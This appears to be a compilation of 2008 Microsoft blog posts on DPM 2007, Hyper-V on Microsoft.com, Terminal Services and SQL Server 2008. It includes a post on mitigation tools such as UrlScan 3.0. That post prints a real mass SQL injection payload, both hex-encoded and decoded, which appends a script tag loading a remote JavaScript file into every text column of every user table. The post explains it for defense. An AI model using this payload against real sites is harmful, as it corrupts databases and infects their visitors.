Windows Server 2008

The Windows Storage Solutions team that manages DPM 2007 is very excited to announce that the ‘Rollup Update’ for System Center Data Protection Manager 2007 is now available for download.   The biggest new workload that DPM now has supported protection for is, of course, Windows Server 2008.

While DPM2007 has actually been protecting “Longhorn” since Beta 3, this update makes Windows Server 2008 a supported protect-able workload.

Specific new capabilities for Windows Server 2008 include:

Protect Windows Server 2008 systems, including those running Core

Protect Windows Server 2008 System State

Ability to run the DPM2007 Server on a Windows Server 2008 platform

Some of the other enhancements in the rollup update include:

Protection for SQL Server 2008

Protection of Virtual Server 2005 R2 clustered hosts

Tape Library Sharing - so that multiple DPM servers can share a single enterprise tape library silo

 

For more details on what is included in the DPM 2007 “Rollup Update” or in the upcoming Service Pack 1, please check out:

TechNet webcast on “What is coming next for DPM 2007” from April 23, 2008

The DPM 2007 Rollup Update is now available via Microsoft Update, if your DPM server has opt’ed in for updates … or it is downloadable from:

System Center Data Protection Manager 2007 - Rollup Update - x86

System Center Data Protection Manager 2007 - Rollup Update - x64

Microsoft is committed to continuing to make DPM2007 an ideal solution for protecting and recovering your Windows infrastructure.  So, stay tuned as we get ready to launch the beta for DPM 2007 Service Pack 1 later this Summer – including the updates listed above, PLUS:

Protection for Hyper-V

More capabilities around SQL Server databases

New features for protecting SharePoint farms

And some other features that we are keeping a surprise for now.  

For more news and updates on DPM 2007, be sure to also check out the DPM BLOG.

 

-- Jason Buffington / Windows Storage Solutions

This is a temporary post that was not deleted. Please delete this manually. (cb4c5022-9b32-435e-b437-82e964717797 - 3bfe001a-32de-4114-a6b4-4005b770f6d7)

Hi—I am Rob Emanuel, a Technology Architect on the Microsoft.com Operations team focusing on virtualization.  I wanted to share the great progress we have made rolling out Hyper-V since my first blog a month ago.   In that blog I discussed our success with fully virtualizing the web front ends for MSDN and TechNet on Hyper-V RC0.   I also highlighted an article our team wrote about how we approached those virtualizations and hopefully conveyed how truly successful we found Hyper-V to be as a web platform.

 

Microsoft.com Powered by Hyper-V

 

One of our more challenging systems from a server subsystem utilization perspective is www.microsoft.com.  The site handles 15,000 requests per second, 1.2 billion page views per month, and 280M worldwide unique users per month as well as supporting ~5000 content contributors from within the company.  This site has close to 300GB of content consisting of some seven million individual files on each server.  Due to this scale and the variety of applications hosted, the site heavily exercises all of the major subsystems - memory, CPU, network, and file I/O – on each server.  Based on the load characteristics and the fact that this site is a testing ground for early adoption of Microsoft technology, we expected the production load of www.microsoft.com to provide a great test for Hyper-V.

 

On June 5^th our Operations Team turned up a full sixteen VM cluster hosting www.microsoft.com on Hyper-V.   That cluster is handling 25% of the production traffic load and can scale past that to support data center redundancy goals.  We have not encountered any performance, stability or availability issues on the virtualized cluster. 

 

The Deployment

 

We began our deployment on the www.microsoft.com site with a single server back in March running on Hyper-V Beta.  We continued with live load testing and artificial stress load similar to our approach with the MSDN deployment.  This single VM was as stable, reliable and performed better with live internet load as compared to the older physical servers in the cluster.   With the success of the first VM running www.microsoft.com we decided to expand to an entire cluster of servers.  This was also a great opportunity to leverage SCVMM 2008 beta for the first time in production. 

 

At the time the SCVMM 2008 beta required Hyper-V RC0 so in order to use SCVMM and Hyper-V together, RC0 was utilized through the deployment phase.  Once the deployment was complete, the servers were all upgraded to Hyper-V RC1.  

 

Using SCVMM we created a “golden” web server image for www.microsoft.com including both the server and content to improve deployment speed as well as configuration control.  Previously a new deployment of www.microsoft.com involved 12 hours to sync the 7 million small content files over the network.  Utilizing a single content VHD cut this time down to 4 hours. 

 

We had limited test hardware available for this first phase so, were only able to deploy one VM per physical server.  Clearly this is not an optimal strategy for long term virtualization given that each server has 8 processors, but it did allow us to move quickly with the hardware we had available.  The next stage of our www.microsoft.com virtualization will take place on a SAN based infrastructure allowing us to run multiple VMs per server head. 

 

Current www.microsoft.com Virtualized Environment

Component	Description
Hardware	Dual socket Quad-Core Intel processors 32GB RAM 4x146GB disk drives
Virtual machines	4 Virtual processors 30GB RAM 50GB dynamic VHD – OS 385GB dynamic VHD – Data\Logs
Operating system – Parent	Windows Server 2008 Hyper-V RC1 Enterprise version Reserved 4GB RAM from 32GB total
Operating system – VMs	Windows Server 2008 Enterprise version Internet Information Services (IIS) 7.0

 

Availability

 

One of our primary goals is maintaining high availability regardless of where we are in the technology lifecycle.  We measure availability in a variety of ways, but one of the baseline tests we use is a 3^rd party provided HTTP request from 45 worldwide agents against the www.microsoft.com hosting platform – currently Windows Server 2008, IIS7 and now Hyper-V.   The average availability of the platform prior to our Hyper-V based deployment was 99.94% and is running at an average of 99.95% since the deployment of the first cluster.  Since this particular measure is an Internet based test, meeting or exceeding previous results means we’ve hit our goal.

 

Platform availability before and after Hyper-V Deployed to handle 25% of traffic

 

 

Performance

 

We have been very encouraged by the stability, scalability and performance of Hyper-V on the www.microsoft.com site.  In terms of performance for this site, overall the results are in-line with previously observed measures while virtualizing MSDN and TechNet.  As with those sites we completed comparison testing of the VMs against both the current and new physical servers.  The outcome of the current physical servers vs. new VM comparison helped us determine how many VMs running www.microsoft.com we would need to match the current physical server capacity as well as handle projected growth.   Given the VM performance on the new servers we’ll consolidate down from 80 physical servers to 64 VMs.   Those VMs will initially be deployed onto a total of 40 new physical servers. 

 

Our initial performance testing showed a 10% CPU overhead in running www.microsoft.com in a virtual machine.   This testing was based on sustained live traffic using matching hardware for the VM host and the physical server.   Both the physical server and the VM were configured with four processors, 30GB RAM and included matching disk and network subsystems to provide for an accurate comparison.  

 

Based on these results we are ready to fully host www.microsoft.com web servers on Hyper-V and we’re targeting end of June for 50% of the load.  As soon as we complete deployment of our new hardware infrastructure in diverse data centers, we’ll complete the full virtualization. 

 

Also check out our TechCenter for further information about our group’s technology adoption efforts.

 

I hope you enjoy virtualizing on Hyper-V as much as we have.

 

-Rob

With summer in Redmond just around the corner, I know a number of teachers  that like to take trips or do odd jobs  around the house while school is out.  However the teachers in California’s Manteca Unified School District still have access to classroom applications at home (or anywhere they have internet access) because of Windows Server 2008. 

 

The school district is a prime example of success that can be had with the Terminal Services RemoteApp feature of WS08.

 

One of the initial goals of their WS08 deployment was to move away from establishing a dedicated virtual private network (VPN) for their 30 schools and 4,000 staff members to access information.  With Terminal Services, teachers are now able to securely access the same information available in their classrooms, using their home PC. Due to its success, the district also plans to install Terminal Services on nine more servers before the 2008-2009 school year begins.

 

We continue to hear great feedback on the actual deployment time of WS08 as well.  Manteca’s deployment of WS08 was pretty quick—IT staff was able to deploy all applications to one server, rather than 5,500 times to individual desktop computers.

 

If you are looking for more information on Terminal Services, check out the Terminal Services Team Blog.

 

-Michael

Remember the post by Aaron Bertrand titled Call a spade a spade! (SQL injection, or IIS vulnerability?)? Microsoft has released 3 tools that deal with this SQL injection.

These three tools include HP Scrawlr , UrlScan version 3.0 Beta , and a SQL Source Code Analysis Tool. Microsoft further recommends following the best practices found within advisory 954462.

Most of the sites affected had this submitted as part of the injection  

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415 245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655 F437572736F7220435552534F5220464F522053454C45435420612E6 E616D652C622E6E616D652046524F4D207379736F626A65637473206 12C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747 970653D3939204F5220622E78747970653D3335204F5220622E78747 970653D323331204F5220622E78747970653D31363729204F50454E2 05461626C655F437572736F72204645544348204E4558542046524F4 D205461626C655F437572736F7220494E544F2040542C40432057484 94C4528404046455443485F5354415455533D302920424547494E204 55845432827555044415445205B272B40542B275D20534554205B272 B40432B275D3D525452494D28434F4E5645525428564152434841522 834303030292C5B272B40432B275D29292B27273C736372697074207 372633D687474703A2F2F7777772E63686B626E722E636F6D2F622E6 A733E3C2F7363726970743E27272729204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C40432 0454E4420434C4F5345205461626C655F437572736F72204445414C4 C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);

This is of course done so that you can't see the real SQL and then you can't check for DROP, UPDATE and other DDL and DML commands 

So what does this look like when you replace %20 with a space and exec with print?

DECLARE Table_Cursor

CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b

WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN

EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chkbnr.com/b.js></script>''')

 FETCH NEXT FROM Table_Cursor INTO @T,@C

END CLOSE Table_Cursor DEALLOCATE Table_Cursor  

Somehow I think this could have been written set based  :-)

The problem is of course that you should never ever run as dbo or even worse sa. 

 

 

Microsoft published a Security Advisory today providing information for developers and Web administrators on ways in which they can mitigate and prevent SQL injection attacks. As you might have seen, there was a spate of such attacks in late April and it caused quite a few headaches for administrators. Remember that SQL injection attacks target Web application code, not Web server code, so they can only be avoided by making sure that any Web application that accepts user input, which is then used to query a database, follows best practices to ensure that the input does not contain malicious code or syntax that might compromise the database, Web site, or even the whole server.

So the advisory today is not a security bulletin - there are no patches for IIS or SQL Server or ASP.NET to download. However, we are making available some tools that can help mitigate these attacks while the underlying Web application code is being fixed to follow security best practices for protecting against SQL injection in ASP and ASP.NET. There is a tool from HP that tests sites to help identify pages that might be susceptible to SQL injection attacks, and also a Microsoft Source Code Analyzer from our SQL Server team that actually parses ASP code for data access commands that might be vulnerable to SQL injection.

But the one that I'm most excited about is UrlScan 3.0 Beta. As you may remember, UrlScan originally released with the IIS Lockdown Tool to help mitigate security vulnerabilities that affected IIS 5.0 in Windows 2000 Server. It's an ISAPI filter that examines HTTP requests to check that URLs and other headers are not being padded with overlong strings or unusual characters as a way to conduct a buffer overflow attack. We haven't updated this tool since we released UrlScan Version 2.5 alongside IIS 6.0, because most of the functionality is now available in IIS 7.0 as the Request Filtering module. But as of today, you can download 32-bit and 64-bit versions of UrlScan 3.0 Beta, which extends the functionality to also examine the querystring part of the URL (i.e. the part that comes after a "?" in a URL - typically name/value pairs or other parameters that are passed to a script or application). This can therefore help prevent SQL injection attacks while the underlying Web application code is fixed.

Over on the IIS.net site, you can find a full walkthrough of the tool, as well as some great articles by Wade Hilmo (the guy who wrote UrlScan) and Nazim Lala, another member of our IIS security team. They have full details on the tool and other security guidance you can follow to help protect your Web servers and applications.

David.

Remember this post 46 New Dynamic Management Views In SQL Server 2008 CTP6?

I just checked SQL Server 2008 RC0 and there are no new Dynamic Management Views when compared to CTP6.

Sorry, can't make up any DMVs :-(

 

Now, if you could do this

SELECT CAST('00:15:00' as TIME(0)) + 5

instead of

SELECT DATEADD(hh,5,CAST('00:15:00' as TIME(0)))

Wouldn't that be nice? You can do it with datetime, for example SELECT GETDATE() + 5

TechEd 2008 IT Professional was a blast! It was great to meet and talk with many of you IT Pros. An opportunity came my way to discuss some of the lesser known features of Windows Server 2008, especially with relation to Active Directory. Take a look, this is a 2 part video. RODC, Auditing, Password Policies, and Domain Controller location (this is the biggie) are all discussed. Hopefully this gives some insight into the little things. Enjoy!

 

Justin Graham

Click on "Test Drive" to participate in a Virtual Lab of Windows Server 2008.

By following a few simple guidelines, you can maintain your computer and keep it running smoothly.